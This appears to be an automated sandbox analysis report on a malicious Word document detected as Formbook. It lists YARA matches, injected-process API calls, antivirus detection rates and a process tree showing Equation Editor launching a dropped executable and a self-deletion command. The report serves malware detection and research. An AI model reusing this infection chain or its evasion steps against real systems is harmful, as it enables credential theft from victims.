          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037F108
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_003706CC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00441D51
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445E40
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00442752
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445450
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C78
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445808
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00449820
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004468C8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004404E7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C88
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414BD
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044B588
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445A0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445B0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445A60
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00443668
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044CE00
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004457FA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00AD79AE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00401026
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041D034
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C0C7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C969
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00401174
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B93E
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00408C90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE0C6
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BED005
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD905A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC3040
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE2E9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C61238
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BE63DB
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBF3CF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C663BF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC2305
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A37B
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC7353
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD1489
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF5485
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BFD47D
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BDC5F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C06540
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC351F
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC4680
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCE6C1
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C62622
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A634
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCC7BC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C4579A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF57C3
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C5F8EE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00AD79AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A1238
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE2E9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A37B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02607353
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02602305
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FF3CF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026263DB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A63BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02603040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261905A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262D005
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE0C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A2622
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A634
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260E6C1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02604680
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026357C3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C7BC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268579A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263D47D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268443E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02635485
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02611489
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02646540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260351F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261C5F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B3A83
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02627B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FFBD7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268DBDA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026ACBA4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262286D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C85C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269F8EE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268394B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02685955
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026169FE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026029B2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A098E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261EE4C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02632E2F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262DF7C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02610F3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02672FDC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269CFB1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260CD5B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02630D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269FDDD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009D034
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009C0C5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 02643F92 appears 132 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0264373B appears 244 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0266F970 appears 84 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C2F970 appears 46 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00BBDF5C appears 65 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C0373B appears 109 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C03F92 appears 72 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185F0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004186A0 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418720 NtClose,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185EA NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418642 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041869A NtReadFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041871A NtClose,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000985F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000986A0 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_00098720 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000987D0 NtAllocateVirtualMemory,
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76E90000 page execute and read and write
          Source: PO789.docVirustotal: Detection: 57%
          Source: PO789.docReversingLabs: Detection: 53%
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
